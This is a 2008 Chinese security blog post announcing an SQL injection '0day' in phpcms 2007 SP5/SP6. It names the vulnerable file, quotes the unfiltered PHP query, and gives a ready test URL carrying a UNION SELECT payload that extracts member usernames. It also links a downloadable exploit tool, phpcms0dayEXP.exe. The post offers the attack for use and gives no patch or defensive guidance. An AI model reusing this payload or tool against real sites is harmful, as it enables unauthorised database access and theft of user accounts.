影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 9 48
   1234
567891011
12131415161718
19202122232425
2627282930


站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749326 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

一个暴jsp源码的网页 用工具下载fs2you资源
晴天 phpcms injection  0day   [ 日期:2008-03-10 ]   [ 来自:影子鹰 ]

感谢sniperhg的投递!

影响版本:2007SP5 SP6
漏洞文件:/formguide/include/tag.func.php
Author:backerhack 小蟑螂
信息来源:零客网安 www.0kee.com
祝全国女性同胞们节日快乐,关注女性健康… “她好,我也好”
------------灰常淫荡的分割线-------------------------------------------------------
 {
 global $db,$MOD,$MODULE;
 $formid = (!isset($formid)||$formid=='') ? 0 : $formid;
 $query = "SELECT * FROM ".TABLE_FORMGUIDE." WHERE formid=$formid limit 1";
 $r = $db->get_one($query);
 if(!$r)
 {
 echo $LANG['not_exist_form'];
 return ''; 
 }

变量formid未赋值且过滤不严带入查询导致注入。
测试:http://phpcmsroot/formguide/index.php?formid=1/**/and/**/1=2/**/union/**/select/**/1,username,3,4,5,6,7/**/from/**/phpcms_member/**/where/**/userid=1/*
附上sniperhg写的利用工具… 写的真的很强大,赞一个!
phpcms0dayEXP.exe MD5值:cae31a3ef566ed06068473d787d76359

下载


[ 字体大小: ]
引用通告地址 (56):
复制引用地址http://www.cnyzy.cn/trackback.asp?tbID=719
复制引用地址http://www.cnyzy.cn/trackback.asp?tbID=719&CP=GBK
请不要吝惜您的评论,每一条评论,都是我在漫漫长夜前行的力量...
暂时没有评论
发表评论 -不要忘了输入验证码哦![本站已启用NoFollow标签,广告者请止步!]
作者: 用户:  密码:   注册? 验证: 
评论:

禁止表情
禁止UBB
禁止图片
识别链接
识别关键字
表  情
   
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.185547 second(s) , 8 queries